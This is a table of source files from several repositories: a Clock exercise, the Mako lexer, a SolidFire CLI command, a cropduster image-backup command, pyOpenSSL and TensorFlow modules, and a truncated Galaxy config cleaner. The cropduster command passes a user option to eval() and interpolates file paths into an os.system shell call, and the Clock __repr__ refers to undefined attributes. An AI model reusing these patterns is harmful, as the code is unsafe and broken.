repo_name | ref | path | copies | content
---|---|---|---|---|
Zero-man/exercism | refs/heads/master | python/clock/clock.py | 1 | class Clock:
def __init__(self, hours, minutes):
self.hours = hours
self.minutes = minutes
def __repr__(self):
return "%02d:%02d" % (self.hour, self.minute)
|
2013Commons/HUE-SHARK | refs/heads/master | build/env/lib/python2.7/site-packages/Mako-0.7.2-py2.7.egg/mako/lexer.py | 19 | # mako/lexer.py
# Copyright (C) 2006-2012 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""provides the Lexer class for parsing template strings into parse trees."""
import re, codecs
from mako import parsetree, exceptions, util
from mako.pygen import adjust_whitespace
_regexp_cache = {}
class Lexer(object):
def __init__(self, text, filename=None,
disable_unicode=False,
input_encoding=None, preprocessor=None):
self.text = text
self.filename = filename
self.template = parsetree.TemplateNode(self.filename)
self.matched_lineno = 1
self.matched_charpos = 0
self.lineno = 1
self.match_position = 0
self.tag = []
self.control_line = []
self.ternary_stack = []
self.disable_unicode = disable_unicode
self.encoding = input_encoding
if util.py3k and disable_unicode:
raise exceptions.UnsupportedError(
"Mako for Python 3 does not "
"support disabling Unicode")
if preprocessor is None:
self.preprocessor = []
elif not hasattr(preprocessor, '__iter__'):
self.preprocessor = [preprocessor]
else:
self.preprocessor = preprocessor
@property
def exception_kwargs(self):
return {'source':self.text,
'lineno':self.matched_lineno,
'pos':self.matched_charpos,
'filename':self.filename}
def match(self, regexp, flags=None):
"""compile the given regexp, cache the reg, and call match_reg()."""
try:
reg = _regexp_cache[(regexp, flags)]
except KeyError:
if flags:
reg = re.compile(regexp, flags)
else:
reg = re.compile(regexp)
_regexp_cache[(regexp, flags)] = reg
return self.match_reg(reg)
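# Note: the cache key is the (regexp, flags) tuple in the module-level
# _regexp_cache, so compiled patterns are shared across Lexer instances;
# only the first call with a given pattern pays the re.compile() cost.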
def match_reg(self, reg):
"""match the given regular expression object to the current text
position.
if a match occurs, update the current text and line position.
"""
mp = self.match_position
match = reg.match(self.text, self.match_position)
if match:
(start, end) = match.span()
if end == start:
self.match_position = end + 1
else:
self.match_position = end
self.matched_lineno = self.lineno
lines = re.findall(r"\n", self.text[mp:self.match_position])
cp = mp - 1
while cp >= 0 and cp < self.textlength and self.text[cp] != '\n':
cp -= 1
self.matched_charpos = mp - cp
self.lineno += len(lines)
#print "MATCHED:", match.group(0), "LINE START:",
# self.matched_lineno, "LINE END:", self.lineno
#print "MATCH:", regexp, "\n", self.text[mp : mp + 15], \
# (match and "TRUE" or "FALSE")
return match
def parse_until_text(self, *text):
startpos = self.match_position
text_re = r'|'.join(text)
brace_level = 0
while True:
match = self.match(r'#.*\n')
if match:
continue
match = self.match(r'(\"\"\"|\'\'\'|\"|\')((?<!\\)\\\1|.)*?\1',
re.S)
if match:
continue
match = self.match(r'(%s)' % text_re)
if match:
if match.group(1) == '}' and brace_level > 0:
brace_level -= 1
continue
return \
self.text[startpos:\
self.match_position-len(match.group(1))],\
match.group(1)
match = self.match(r"(.*?)(?=\"|\'|#|%s)" % text_re, re.S)
if match:
brace_level += match.group(1).count('{')
brace_level -= match.group(1).count('}')
continue
raise exceptions.SyntaxException(
"Expected: %s" %
','.join(text),
**self.exception_kwargs)
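# A hedged illustration: with the remaining source "name.upper()} tail" and a
# call parse_until_text(r'}'), the loop consumes "name.upper()" via the text
# regexp, then matches the terminator and returns ("name.upper()", "}").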
def append_node(self, nodecls, *args, **kwargs):
kwargs.setdefault('source', self.text)
kwargs.setdefault('lineno', self.matched_lineno)
kwargs.setdefault('pos', self.matched_charpos)
kwargs['filename'] = self.filename
node = nodecls(*args, **kwargs)
if len(self.tag):
self.tag[-1].nodes.append(node)
else:
self.template.nodes.append(node)
# build a set of child nodes for the control line
# (used for loop variable detection)
# also build a set of child nodes on ternary control lines
# (used for determining if a pass needs to be auto-inserted)
if self.control_line:
control_frame = self.control_line[-1]
control_frame.nodes.append(node)
if not (isinstance(node, parsetree.ControlLine) and
control_frame.is_ternary(node.keyword)):
if self.ternary_stack and self.ternary_stack[-1]:
self.ternary_stack[-1][-1].nodes.append(node)
if isinstance(node, parsetree.Tag):
if len(self.tag):
node.parent = self.tag[-1]
self.tag.append(node)
elif isinstance(node, parsetree.ControlLine):
if node.isend:
self.control_line.pop()
self.ternary_stack.pop()
elif node.is_primary:
self.control_line.append(node)
self.ternary_stack.append([])
elif self.control_line and \
self.control_line[-1].is_ternary(node.keyword):
self.ternary_stack[-1].append(node)
elif self.control_line and \
not self.control_line[-1].is_ternary(node.keyword):
raise exceptions.SyntaxException(
"Keyword '%s' not a legal ternary for keyword '%s'" %
(node.keyword, self.control_line[-1].keyword),
**self.exception_kwargs)
_coding_re = re.compile(r'#.*coding[:=]\s*([-\w.]+).*\r?\n')
def decode_raw_stream(self, text, decode_raw, known_encoding, filename):
"""given string/unicode or bytes/string, determine encoding
from magic encoding comment, return body as unicode
or raw if decode_raw=False
"""
if isinstance(text, unicode):
m = self._coding_re.match(text)
encoding = m and m.group(1) or known_encoding or 'ascii'
return encoding, text
if text.startswith(codecs.BOM_UTF8):
text = text[len(codecs.BOM_UTF8):]
parsed_encoding = 'utf-8'
m = self._coding_re.match(text.decode('utf-8', 'ignore'))
if m is not None and m.group(1) != 'utf-8':
raise exceptions.CompileException(
"Found utf-8 BOM in file, with conflicting "
"magic encoding comment of '%s'" % m.group(1),
text.decode('utf-8', 'ignore'),
0, 0, filename)
else:
m = self._coding_re.match(text.decode('utf-8', 'ignore'))
if m:
parsed_encoding = m.group(1)
else:
parsed_encoding = known_encoding or 'ascii'
if decode_raw:
try:
text = text.decode(parsed_encoding)
except UnicodeDecodeError, e:
raise exceptions.CompileException(
"Unicode decode operation of encoding '%s' failed" %
parsed_encoding,
text.decode('utf-8', 'ignore'),
0, 0, filename)
return parsed_encoding, text
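# Sketch of the expected behavior (hypothetical inputs): a byte string that
# begins with "# -*- coding: latin-1 -*-" yields ('latin-1', text) with the
# body decoded when decode_raw is True; a UTF-8 BOM plus a conflicting magic
# comment raises CompileException, per the branch above.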
def parse(self):
self.encoding, self.text = self.decode_raw_stream(self.text,
not self.disable_unicode,
self.encoding,
self.filename,)
for preproc in self.preprocessor:
self.text = preproc(self.text)
# push the match marker past the
# encoding comment.
self.match_reg(self._coding_re)
self.textlength = len(self.text)
while (True):
if self.match_position > self.textlength:
break
if self.match_end():
break
if self.match_expression():
continue
if self.match_control_line():
continue
if self.match_comment():
continue
if self.match_tag_start():
continue
if self.match_tag_end():
continue
if self.match_python_block():
continue
if self.match_text():
continue
if self.match_position > self.textlength:
break
raise exceptions.CompileException("assertion failed")
if len(self.tag):
raise exceptions.SyntaxException("Unclosed tag: <%%%s>" %
self.tag[-1].keyword,
**self.exception_kwargs)
if len(self.control_line):
raise exceptions.SyntaxException(
"Unterminated control keyword: '%s'" %
self.control_line[-1].keyword,
self.text,
self.control_line[-1].lineno,
self.control_line[-1].pos, self.filename)
return self.template
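# Minimal end-to-end usage sketch (hypothetical template string):
#   template_node = Lexer("hello ${name}!").parse()
#   # -> a parsetree.TemplateNode whose .nodes hold Text and Expression nodes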
def match_tag_start(self):
match = self.match(r'''
\<% # opening tag
([\w\.\:]+) # keyword
((?:\s+\w+|\s*=\s*|".*?"|'.*?')*) # attrname, = \
# sign, string expression
\s* # more whitespace
(/)?> # closing
''',
re.I | re.S | re.X)
if match:
keyword, attr, isend = match.groups()
self.keyword = keyword
attributes = {}
if attr:
for att in re.findall(
r"\s*(\w+)\s*=\s*(?:'([^']*)'|\"([^\"]*)\")", attr):
key, val1, val2 = att
text = val1 or val2
text = text.replace('\r\n', '\n')
attributes[key] = text
self.append_node(parsetree.Tag, keyword, attributes)
if isend:
self.tag.pop()
else:
if keyword == 'text':
match = self.match(r'(.*?)(?=\</%text>)', re.S)
if not match:
raise exceptions.SyntaxException(
"Unclosed tag: <%%%s>" %
self.tag[-1].keyword,
**self.exception_kwargs)
self.append_node(parsetree.Text, match.group(1))
return self.match_tag_end()
return True
else:
return False
def match_tag_end(self):
match = self.match(r'\</%[\t ]*(.+?)[\t ]*>')
if match:
if not len(self.tag):
raise exceptions.SyntaxException(
"Closing tag without opening tag: </%%%s>" %
match.group(1),
**self.exception_kwargs)
elif self.tag[-1].keyword != match.group(1):
raise exceptions.SyntaxException(
"Closing tag </%%%s> does not match tag: <%%%s>" %
(match.group(1), self.tag[-1].keyword),
**self.exception_kwargs)
self.tag.pop()
return True
else:
return False
def match_end(self):
match = self.match(r'\Z', re.S)
if match:
string = match.group()
if string:
return string
else:
return True
else:
return False
def match_text(self):
match = self.match(r"""
(.*?) # anything, followed by:
(
(?<=\n)(?=[ \t]*(?=%|\#\#)) # an eval or line-based
# comment preceded by a
# consumed newline and whitespace
|
(?=\${) # an expression
|
(?=\#\*) # multiline comment
|
(?=</?[%&]) # a substitution or block or call start or end
# - don't consume
|
(\\\r?\n) # an escaped newline - throw away
|
\Z # end of string
)""", re.X | re.S)
if match:
text = match.group(1)
if text:
self.append_node(parsetree.Text, text)
return True
else:
return False
def match_python_block(self):
match = self.match(r"<%(!)?")
if match:
line, pos = self.matched_lineno, self.matched_charpos
text, end = self.parse_until_text(r'%>')
# the trailing newline helps
# compiler.parse() not complain about indentation
text = adjust_whitespace(text) + "\n"
self.append_node(
parsetree.Code,
text,
match.group(1)=='!', lineno=line, pos=pos)
return True
else:
return False
def match_expression(self):
match = self.match(r"\${")
if match:
line, pos = self.matched_lineno, self.matched_charpos
text, end = self.parse_until_text(r'\|', r'}')
if end == '|':
escapes, end = self.parse_until_text(r'}')
else:
escapes = ""
text = text.replace('\r\n', '\n')
self.append_node(
parsetree.Expression,
text, escapes.strip(),
lineno=line, pos=pos)
return True
else:
return False
def match_control_line(self):
match = self.match(
r"(?<=^)[\t ]*(%(?!%)|##)[\t ]*((?:(?:\\r?\n)|[^\r\n])*)"
r"(?:\r?\n|\Z)", re.M)
if match:
operator = match.group(1)
text = match.group(2)
if operator == '%':
m2 = re.match(r'(end)?(\w+)\s*(.*)', text)
if not m2:
raise exceptions.SyntaxException(
"Invalid control line: '%s'" %
text,
**self.exception_kwargs)
isend, keyword = m2.group(1, 2)
isend = (isend is not None)
if isend:
if not len(self.control_line):
raise exceptions.SyntaxException(
"No starting keyword '%s' for '%s'" %
(keyword, text),
**self.exception_kwargs)
elif self.control_line[-1].keyword != keyword:
raise exceptions.SyntaxException(
"Keyword '%s' doesn't match keyword '%s'" %
(text, self.control_line[-1].keyword),
**self.exception_kwargs)
self.append_node(parsetree.ControlLine, keyword, isend, text)
else:
self.append_node(parsetree.Comment, text)
return True
else:
return False
def match_comment(self):
"""matches the multiline version of a comment"""
match = self.match(r"<%doc>(.*?)</%doc>", re.S)
if match:
self.append_node(parsetree.Comment, match.group(1))
return True
else:
return False
|
solidfire/solidfire-cli | refs/heads/master | element/cli/commands/cmd_sfapi.py | 2 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright © 2014-2016 NetApp, Inc. All Rights Reserved.
#
# DO NOT EDIT THIS CODE BY HAND! It has been generated with jsvcgen.
#
import click
from element.cli import utils as cli_utils
from element.cli import parser
from element.cli.cli import pass_context
from element import utils
import jsonpickle
import simplejson
from solidfire.models import *
from solidfire.custom.models import *
from uuid import UUID
from element import exceptions
from solidfire import common
from element.cli.cli import SolidFireOption, SolidFireCommand
class ProtectionSchemeVisibility(data_model.DataObject):
"""ProtectionSchemeVisibility
The public visibility of the protection scheme.
"""
enum_values = ("customer", "testOnly", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class RemoteClusterSnapshotStatus(data_model.DataObject):
"""RemoteClusterSnapshotStatus
Status of the remote snapshot on the target cluster as seen on the source cluster
"""
enum_values = ("Present", "Not Present", "Syncing", "Deleted", "Unknown", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class ProtectionSchemeCategory(data_model.DataObject):
"""ProtectionSchemeCategory
The category of the protection scheme.
"""
enum_values = ("helix", "erasureCoded", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class ProtectionScheme(data_model.DataObject):
"""ProtectionScheme
The method of protecting data on the cluster
"""
enum_values = ("singleHelix", "doubleHelix", "tripleHelix", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class AuthConfigType(data_model.DataObject):
"""AuthConfigType
This type indicates the configuration data which will be accessed or modified by the element auth container.
"""
enum_values = ("mNode", "element", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class DriveEncryptionCapabilityType(data_model.DataObject):
"""DriveEncryptionCapabilityType
This specifies a drive's encryption capability.
"""
enum_values = ("none", "sed", "fips", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class FipsDrivesStatusType(data_model.DataObject):
"""FipsDrivesStatusType
This specifies a node's FIPS 140-2 compliance status.
"""
enum_values = ("None", "Partial", "Ready", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class AuthMethod(data_model.DataObject):
"""AuthMethod
This type qualifies a ClusterAdmin with its authentication method.
"""
enum_values = ("Cluster", "Ldap", "Idp", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class MaintenanceMode(data_model.DataObject):
"""MaintenanceMode
Which mode a node is in when it is having maintenance performed.
"""
enum_values = ("Disabled", "FailedToRecover", "Unexpected", "RecoveringFromMaintenance", "PreparingForMaintenance", "ReadyForMaintenance", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class ProposedNodeErrorCode(data_model.DataObject):
"""ProposedNodeErrorCode
This specifies error code for a proposed node addition.
"""
enum_values = ("nodesNoCapacity", "nodesTooLarge", "nodesConnectFailed", "nodesQueryFailed", "nodesClusterMember", "nonFipsNodeCapable", "nonFipsDrivesCapable", "nodeTypeUnsupported", "nodeTypesHeterogeneous", "nodeTypeInvalid", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class VolumeAccess(data_model.DataObject):
"""VolumeAccess
Describes host access for a volume.
"""
enum_values = ("locked", "readOnly", "readWrite", "replicationTarget", "snapMirrorTarget", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
class ProtectionDomainType(data_model.DataObject):
"""ProtectionDomainType
A Protection Domain is a set of one or more components whose simultaneous failure is protected
from causing data unavailability or loss. This specifies one of the types of Protection Domains
recognized by this cluster.
"""
enum_values = ("node", "chassis", "custom", )
def __init__(self, value):
self._value = value
def __str__(self):
return str(self._value)
def get_value(self):
return self._value
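# All of the generated enum-like wrappers above share one shape: they box a
# single string value. A hypothetical round trip:
#   access = VolumeAccess("readOnly")
#   assert str(access) == access.get_value() == "readOnly"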
@click.group()
@pass_context
def cli(ctx):
"""invoke """
@cli.command('invoke',
short_help="""This will invoke any API method supported by the SolidFire API for the version and port the connection is using. Returns a nested hashtable of key/value pairs that contain the result of the invoked method. """,
cls=SolidFireCommand)
@click.option('--method',
type=str,
required=True,
prompt=True,
help="""The name of the method to invoke. This is case sensitive. """)
@click.option('--parameters',
type=str,
required=False,
help="""An object, normally a dictionary or hashtable of the key/value pairs, to be passed as the params for the method being invoked. Has the following subparameters: """)
@pass_context
def invoke(ctx,
# Mandatory main parameter
method,
# Optional main parameter
parameters=None):
"""This will invoke any API method supported by the SolidFire API for the version and port the connection is using."""
"""Returns a nested hashtable of key/value pairs that contain the result of the invoked method."""
if ctx.json is True:
ctx.logger.error("This command does not support the -j field. If you really need it, use sfapi invoke.")
exit(1)
cli_utils.establish_connection(ctx)
kwargsDict = None
if (parameters is not None and parameters != ()):
try:
kwargsDict = simplejson.loads(parameters)
except Exception as e:
ctx.logger.error(e.__str__())
exit(1)
ctx.logger.info(": method = " + str(method) + ";parameters = " + str(kwargsDict) + ";")
try:
_dict = ctx.element.invoke_sfapi(method=method, parameters=kwargsDict)
except common.ApiServerError as e:
ctx.logger.error(e.message)
exit()
except BaseException as e:
ctx.logger.error(e.__str__())
exit()
if ctx.json:
print(simplejson.dumps(simplejson.loads(_dict), indent=4))
return
else:
cli_utils.print_result(_dict, ctx.logger, as_json=ctx.json, as_pickle=ctx.pickle, depth=ctx.depth,
filter_tree=ctx.filter_tree)
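# Example shell invocation (hypothetical method and parameters; the exact
# entry point depends on how the CLI is installed):
#   sfapi invoke --method GetClusterInfo --parameters '{"force": true}'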
|
ZG-Tennis/django-cropduster | refs/heads/master | cropduster/management/commands/backup_images.py | 2 | # Place in cropduster/management/commands/backup_images.py.
# Afterwards, the command can be run using:
# manage.py backup_images
#
# Search for 'changeme' for lines that should be modified
import sys
import os
import tempfile
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from cropduster.models import Image as CropDusterImage,CropDusterField as CDF
from cropduster.utils import create_cropped_image, rescale
import apputils
import Image
class Command(BaseCommand):
args = "app1 [app2...]"
help = "Backs up all images for an app in cropduster."
option_list = BaseCommand.option_list + (
make_option('--only_originals',
action="store_true",
dest='only_origs',
help="Indicates whether or not to include derived thumbnails. If provided, will exclude all derived images. This would make it necessary to run regenerate_thumbs."),
make_option('--query_set',
dest = "query_set",
default = "all()",
help = "Queryset to use. Default uses all(). This option makes it possible to do iterative backups"),
make_option('--backup_file',
dest="backup_file",
default="cropduster.bak.tar",
help = "TarFile location to store backup")
)
def get_queryset(self, model, query_str):
"""
Gets the query set from the provided model based on the user's filters.
@param model: Django Model to query
@type model: Class
@param query_str: Filter query to retrieve objects with
@type query_str: "filter string"
@return: QuerySet for the given model.
@rtype: <iterable of object>
"""
query_str = 'model.objects.' + query_str.lstrip('.')
return eval(query_str, dict(model=model))
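# e.g. (hypothetical) query_str "filter(id__gt=100)" evaluates to
# model.objects.filter(id__gt=100); the default "all()" selects everything.
# Because this uses eval(), the filter string must come from a trusted caller.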
def get_derived_paths(self, cd_image):
"""
Gets the derived image paths.
@param cd_image: Cropduster image to use
@type cd_image: CropDusterImage
@return: Paths of derived images that exist on disk.
@rtype: generator of str
"""
for size in cd_image.size_set.size_set.all():
path = cd_image.thumbnail_path(size)
if os.path.exists(path):
yield path
def find_image_files(self, apps, query_set, only_originals):
"""
Finds all images specified in apps and builds a list of paths that
need to be stored.
@param apps: Set of app paths to look for images in.
@type apps: ["app[:model[.field]], ...]
@param query_set: Query set of models to backup.
@type query_set: str
@param only_originals: Whether or not to only backup originals.
@type only_originals: bool
"""
# Figures out the models and cropduster fields on them
for model, field_names in apputils.resolve_apps(apps):
# Returns the queryset for each model
query = self.get_queryset(model, query_set)
for obj in query:
for field_name in field_names:
# Sanity check; we really should have a cropduster image here.
cd_image = getattr(obj, field_name)
if not (cd_image and isinstance(cd_image, CropDusterImage)):
continue
# Make sure the image actually exists.
file_name = cd_image.image.path
if not os.path.exists(file_name):
sys.stderr.write('missing: %s\n' % file_name)
continue
yield file_name
if only_originals:
continue
# Get all derived images as well
for path in self.get_derived_paths(cd_image):
yield path
#@PrettyError("Failed to build thumbs: %(error)s")
def handle(self, *apps, **options):
"""
Grabs all images for a given app and stores them in a tar file.
"""
abs_path = os.path.abspath( options['backup_file'] )
if os.path.exists(abs_path):
print "\nBackup file `%s` already exists. If you continue, the file "\
"will be overwritten." % options['backup_file']
ret = raw_input('Continue? [y/N]: ')
if not ret.lower() == 'y':
raise SystemExit('Quitting...')
file_list_path = abs_path + '.files'
print "Finding image files..."
# find all images
with file(file_list_path, 'w') as file_list:
for i, path in enumerate(self.find_image_files(apps,
options['query_set'],
options['only_origs'])):
file_list.write( (path+'\n').encode('utf8') )
print "Found %i images to archive" % (locals().get('i', -1) + 1)
# attempt to tar
print "Tarring...."
ret_code = os.system('tar cvf %s.tmp -T %s' % (abs_path, file_list_path)) >> 8
if ret_code > 0:
raise CommandError("Failed when tarring files! Exit code: %i" % ret_code)
# Success!
os.remove(file_list_path)
os.rename(abs_path+'.tmp', abs_path)
print "Successfully tarred images to %s" % abs_path
|
proxysh/Safejumper-for-Desktop | refs/heads/master | buildlinux/env32/lib/python2.7/site-packages/OpenSSL/__init__.py | 22 | # Copyright (C) AB Strakt
# See LICENSE for details.
"""
pyOpenSSL - A simple wrapper around the OpenSSL library
"""
from OpenSSL import rand, crypto, SSL
from OpenSSL.version import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__,
)
__all__ = [
"SSL", "crypto", "rand",
"__author__", "__copyright__", "__email__", "__license__", "__summary__",
"__title__", "__uri__", "__version__",
]
|
ravindrapanda/tensorflow | refs/heads/master | tensorflow/contrib/distributions/python/ops/onehot_categorical.py | 78 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The OneHotCategorical distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import kullback_leibler
from tensorflow.python.ops.distributions import util as distribution_util
class OneHotCategorical(distribution.Distribution):
"""OneHotCategorical distribution.
The categorical distribution is parameterized by the log-probabilities
of a set of classes. The difference between OneHotCategorical and Categorical
distributions is that OneHotCategorical is a discrete distribution over
one-hot bit vectors whereas Categorical is a discrete distribution over
positive integers. OneHotCategorical is equivalent to Categorical except
Categorical has event_dim=() while OneHotCategorical has event_dim=K, where
K is the number of classes.
This class provides methods to create indexed batches of OneHotCategorical
distributions. If the provided `logits` or `probs` is rank 2 or higher, for
every fixed set of leading dimensions, the last dimension represents one
single OneHotCategorical distribution. When calling distribution
functions (e.g. `dist.prob(x)`), `logits` and `x` are broadcast to the
same shape (if possible). In all cases, the last dimension of `logits,x`
represents single OneHotCategorical distributions.
#### Examples
Creates a 3-class distribution, with the 2nd class the most likely to be
drawn from.
```python
p = [0.1, 0.5, 0.4]
dist = OneHotCategorical(probs=p)
```
Creates a 3-class distribution, with the 2nd class the most likely to be
drawn from, using logits.
```python
logits = [-2, 2, 0]
dist = OneHotCategorical(logits=logits)
```
Creates a 3-class distribution, with the 3rd class the most likely to be drawn.
```python
# counts is a scalar.
p = [0.1, 0.4, 0.5]
dist = OneHotCategorical(probs=p)
dist.prob([0,1,0]) # Shape []
# p will be broadcast to [[0.1, 0.4, 0.5], [0.1, 0.4, 0.5]] to match.
samples = [[0,1,0], [1,0,0]]
dist.prob(samples) # Shape [2]
```
"""
def __init__(
self,
logits=None,
probs=None,
dtype=dtypes.int32,
validate_args=False,
allow_nan_stats=True,
name="OneHotCategorical"):
"""Initialize OneHotCategorical distributions using class log-probabilities.
Args:
logits: An N-D `Tensor`, `N >= 1`, representing the log probabilities of a
set of Categorical distributions. The first `N - 1` dimensions index
into a batch of independent distributions and the last dimension
represents a vector of logits for each class. Only one of `logits` or
`probs` should be passed in.
probs: An N-D `Tensor`, `N >= 1`, representing the probabilities of a set
of Categorical distributions. The first `N - 1` dimensions index into a
batch of independent distributions and the last dimension represents a
vector of probabilities for each class. Only one of `logits` or `probs`
should be passed in.
dtype: The type of the event samples (default: int32).
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = locals()
with ops.name_scope(name, values=[logits, probs]):
self._logits, self._probs = distribution_util.get_logits_and_probs(
name=name, logits=logits, probs=probs, validate_args=validate_args,
multidimensional=True)
logits_shape_static = self._logits.get_shape().with_rank_at_least(1)
if logits_shape_static.ndims is not None:
self._batch_rank = ops.convert_to_tensor(
logits_shape_static.ndims - 1,
dtype=dtypes.int32,
name="batch_rank")
else:
with ops.name_scope(name="batch_rank"):
self._batch_rank = array_ops.rank(self._logits) - 1
with ops.name_scope(name="event_size"):
self._event_size = array_ops.shape(self._logits)[-1]
super(OneHotCategorical, self).__init__(
dtype=dtype,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._logits,
self._probs],
name=name)
@property
def event_size(self):
"""Scalar `int32` tensor: the number of classes."""
return self._event_size
@property
def logits(self):
"""Vector of coordinatewise logits."""
return self._logits
@property
def probs(self):
"""Vector of coordinatewise probabilities."""
return self._probs
def _batch_shape_tensor(self):
return array_ops.shape(self.logits)[:-1]
def _batch_shape(self):
return self.logits.get_shape()[:-1]
def _event_shape_tensor(self):
return array_ops.shape(self.logits)[-1:]
def _event_shape(self):
return self.logits.get_shape().with_rank_at_least(1)[-1:]
def _sample_n(self, n, seed=None):
sample_shape = array_ops.concat([[n], array_ops.shape(self.logits)], 0)
logits = self.logits
if logits.get_shape().ndims == 2:
logits_2d = logits
else:
logits_2d = array_ops.reshape(logits, [-1, self.event_size])
samples = random_ops.multinomial(logits_2d, n, seed=seed)
samples = array_ops.transpose(samples)
samples = array_ops.one_hot(samples, self.event_size, dtype=self.dtype)
ret = array_ops.reshape(samples, sample_shape)
return ret
def _log_prob(self, x):
x = self._assert_valid_sample(x)
# broadcast logits or x if need be.
logits = self.logits
if (not x.get_shape().is_fully_defined() or
not logits.get_shape().is_fully_defined() or
x.get_shape() != logits.get_shape()):
logits = array_ops.ones_like(x, dtype=logits.dtype) * logits
x = array_ops.ones_like(logits, dtype=x.dtype) * x
logits_shape = array_ops.shape(math_ops.reduce_sum(logits, -1))
logits_2d = array_ops.reshape(logits, [-1, self.event_size])
x_2d = array_ops.reshape(x, [-1, self.event_size])
ret = -nn_ops.softmax_cross_entropy_with_logits(labels=x_2d,
logits=logits_2d)
# Reshape back to user-supplied batch and sample dims prior to 2D reshape.
ret = array_ops.reshape(ret, logits_shape)
return ret
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _entropy(self):
return -math_ops.reduce_sum(
nn_ops.log_softmax(self.logits) * self.probs, axis=-1)
def _mode(self):
ret = math_ops.argmax(self.logits, axis=self._batch_rank)
ret = array_ops.one_hot(ret, self.event_size, dtype=self.dtype)
ret.set_shape(self.logits.get_shape())
return ret
def _covariance(self):
p = self.probs
ret = -math_ops.matmul(p[..., None], p[..., None, :])
return array_ops.matrix_set_diag(ret, self._variance())
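# For a one-hot draw the covariance is diag(p) - p p^T: the matmul above
# fills the off-diagonals with -p_i * p_j and matrix_set_diag then overwrites
# the diagonal with the variances p_i * (1 - p_i).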
def _variance(self):
return self.probs * (1. - self.probs)
def _assert_valid_sample(self, x):
if not self.validate_args:
return x
return control_flow_ops.with_dependencies([
check_ops.assert_non_positive(x),
distribution_util.assert_close(
array_ops.zeros([], dtype=self.dtype),
math_ops.reduce_logsumexp(x, axis=[-1])),
], x)
@kullback_leibler.RegisterKL(OneHotCategorical, OneHotCategorical)
def _kl_categorical_categorical(a, b, name=None):
"""Calculate the batched KL divergence KL(a || b) with a, b OneHotCategorical.
Args:
a: instance of a OneHotCategorical distribution object.
b: instance of a OneHotCategorical distribution object.
name: (optional) Name to use for created operations.
default is "kl_categorical_categorical".
Returns:
Batchwise KL(a || b)
"""
with ops.name_scope(name, "kl_categorical_categorical", values=[
a.logits, b.logits]):
# sum(p ln(p / q))
return math_ops.reduce_sum(
nn_ops.softmax(a.logits) * (nn_ops.log_softmax(a.logits)
- nn_ops.log_softmax(b.logits)),
axis=-1)
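# Sanity check of the formula: with p = softmax(a.logits) and
# q = softmax(b.logits), the expression above is sum_k p_k*(log p_k - log q_k)
# over the last axis, i.e. the standard discrete KL divergence, batchwise.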
|
mvdbeek/tools-artbio | refs/heads/master | helper_scripts/clean_tool_conf_xml.py | 5 | #!/usr/bin/env python
## Example usage: python clean_tool_conf_xml.py -i /galaxy/config/shed_tool_conf.xml -o clean_shed_tool_conf.xml
import xml.etree.ElementTree as ET
from os import path
from argparse import ArgumentParser
def check_child(root, children, tooldir, removed_tools=[]):
"""
For each child in children, check whether the child is a section; if it
is, recurse into it. Otherwise, if the child is a tool, check that its
file attribute points to an existing path, and remove the child from the
tree (collecting its path in removed_tools) if it does not.
"""
for child in children:
if child.tag == "section":
check_child(root=children,
children=child.getchildren(),
tooldir=tooldir,
removed_tools=removed_tools)
elif child.tag == "tool":
if path.exists(path.join(tooldir, child.attrib["file"])):
pass
else:
children.remove(child)
removed_tools.append(child.attrib["file"])
return removed_tools
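# e.g. a <tool file="owner/repo/tool.xml"/> entry (hypothetical path) whose
# file is missing under tool_path is removed from the tree and its path
# collected in removed_tools for reporting.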
def _parse_cli_options():
"""
Parse command line options, returning `parse_args` from `ArgumentParser`.
"""
parser = ArgumentParser(usage="usage: python %(prog)s <options>")
parser.add_argument("-i", "--input",
dest="input_xml",
required=True,
help="shed_tool_conf.xml or migrated_tool_conf.xml \
that needs to be cleaned from non-existant entries.")
parser.add_argument("-o", "--output_xml",
required=True,
dest="output_xml",
help="Output file for cleaned xml")
return parser.parse_args()
def __main__():
args = _parse_cli_options()
input_xml = args.input_xml
